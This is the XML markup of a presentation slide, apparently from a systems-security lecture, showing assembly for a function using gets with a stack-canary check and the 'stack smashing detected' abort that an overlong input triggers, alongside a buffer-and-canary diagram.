              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</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call    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf</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gets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="162AFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movq</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rsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="162AFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="162AFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rdi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="162AFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    call    puts</a:t>
            </a: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movq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    8(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</a:t>
            </a:r>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xorq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    %fs:0x28, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     .L6</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addq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    $0x18, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.L6:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    call    __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>stack_chk_fail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rounded Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D8659BA-3618-9844-B401-95CF01317307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5256737" y="2677324"/>
            <a:ext cx="6935263" cy="1985366"/>
          </a:xfrm>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olidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="15000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF000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0x7ffe41c142c0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abcdefghi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>abcdefghi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stack smashing detected ***: &lt;unknown&gt; terminated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Abort (core dumped)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C2296C4-EC89-4244-AC42-7460892D1D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="369052" y="2206370"/>
            <a:ext cx="4830980" cy="3175952"/>
            <a:chOff x="197157" y="2192004"/>
            <a:chExt cx="4830980" cy="3175952"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="16" name="Group 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D15E2F8-5B37-B447-86CF-58ED36CB707B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="4573950"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Rectangle 52">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24537A30-9477-C243-8C1A-D4011FE707E1}"/>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4" name="Rectangle 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9099185E-CAB1-1643-AEA8-522CB59231DB}"/>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5" name="Rectangle 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A211EA-2A38-2941-B775-1F5DDFBD005F}"/>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6" name="Rectangle 55">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B77A6F5-2DFB-1F43-B1D3-A6117C464387}"/>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7" name="Rectangle 56">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C974135-B4B0-2648-AC1E-96E33BCF8D91}"/>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8" name="Rectangle 57">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7EAFABF-ECD4-BC4A-AE0C-2164090BFCE9}"/>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59" name="Rectangle 58">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1870BD4-74B3-F240-BE43-3584112FA601}"/>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60" name="Rectangle 59">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88D887C-5876-C749-A470-2E572D5A8E87}"/>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17" name="Group 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2F90964-AC44-9C46-B62D-245D5F4D5002}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2985997"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45" name="Rectangle 44">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79A6298F-CD8F-4D47-ADD1-0C5BAD77BED6}"/>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6" name="Rectangle 45">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{008352E3-1B60-934F-8107-9180467864EE}"/>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7" name="Rectangle 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35B0F740-6C0B-6D4F-9CA8-A239123FF49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8" name="Rectangle 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA9C6DA6-8465-DA4F-8242-3899212379EC}"/>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49" name="Rectangle 48">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5196489-4C74-7E42-B943-D19CAE651245}"/>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0" name="Rectangle 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2732757-9107-3F4A-B9BC-F362A79205C1}"/>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1" name="Rectangle 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5257418B-4879-BB4D-8D9C-D5EB60CD9FD1}"/>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52" name="Rectangle 51">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27F2A8F2-BB40-8144-B137-CF7719839A2B}"/>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8" name="Group 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47354375-1A92-C14D-BF78-250EF5064113}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="3779967"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="37" name="Rectangle 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB4EDE1B-1FF9-C34E-A0E5-A252F9AD3F81}"/>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38" name="Rectangle 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E692232-AC21-984C-9F85-F2672BB467A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39" name="Rectangle 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31466174-41ED-8543-A371-DEBE21E8A9AE}"/>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0" name="Rectangle 39">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE4589B5-9CC8-F641-985A-E7A849EC62C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1" name="Rectangle 40">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2B15CB4-F3DF-E441-BD37-A98CBDA0B598}"/>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2" name="Rectangle 41">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7B3B26F-DBF4-3241-8165-E762162780F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3" name="Rectangle 42">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9415C707-DBD5-B74D-9439-41800A31C2B5}"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="Rectangle 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A92DD0D-1E6C-3845-8F02-CDF44F072DE7}"/>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2060"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B8B61CB-13CC-9141-89B2-FAC19CF1282C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2192004"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="29" name="Rectangle 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F63CD0FC-A5AB-F148-BA5C-CE273AF76B70}"/>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0" name="Rectangle 29">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3EA9403-0054-4749-B1D5-545F9D71493E}"/>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1" name="Rectangle 30">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0A700C0-07C3-7748-9E3C-72470430C689}"/>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2" name="Rectangle 31">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9F58E9C-86A9-E945-920F-C0BD3F311C89}"/>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3" name="Rectangle 32">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD0FCDCE-0FD0-CE4E-981E-2418F97F8A7B}"/>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4" name="Rectangle 33">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C45BB1-90F2-2844-8A70-3DBA2B4BA0AB}"/>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5" name="Rectangle 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75C1A99C-124E-5E4B-8C9F-09D55C1729D9}"/>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36" name="Rectangle 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62592952-C711-D941-A680-0689637F787A}"/>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
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2990601-A062-E444-BCFE-5806C8C1AC57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2113319" y="4673598"/>
            <a:ext cx="1324465" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDEDB05A-E302-FA42-8ABB-C39FE08E175C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2059653" y="3870339"/>
            <a:ext cx="1431802" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>canary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Group 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D30F83E-1B1B-634D-B7FC-3AA43193E190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="370156" y="2206370"/>
            <a:ext cx="4830980" cy="3175952"/>
            <a:chOff x="197157" y="2192004"/>
            <a:chExt cx="4830980" cy="3175952"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="63" name="Group 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D55374FF-E04B-354D-BD03-D48320E67CC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="4573950"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="91" name="Rectangle 90">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06E24CFF-96C0-074A-A7A8-AE8D5CA9D1CC}"/>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2" name="Rectangle 91">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5CE00CF-57CC-3943-A29E-0C2868EBB8B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3" name="Rectangle 92">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA4B914E-B693-CD45-B33E-3BCB651BB02D}"/>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4" name="Rectangle 93">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2DE77BE-DD9E-AE46-99E6-91203CDB4099}"/>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5" name="Rectangle 94">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3C447BA-F6DE-3E46-A976-14427468291E}"/>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6" name="Rectangle 95">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FD17997-91E1-3648-BF29-3773A0C0EDB2}"/>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7" name="Rectangle 96">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E20603-0120-A54C-86B8-C29EA4DF2570}"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="98" name="Rectangle 97">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6607C494-76F9-A142-A692-C1C235197204}"/>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latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="64" name="Group 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B6D404-1FFC-8244-9064-13F941EE5CD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="197157" y="2985997"/>
              <a:ext cx="4830980" cy="794006"/>
              <a:chOff x="9208848" y="3986002"/>
              <a:chExt cx="1940175" cy="245224"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
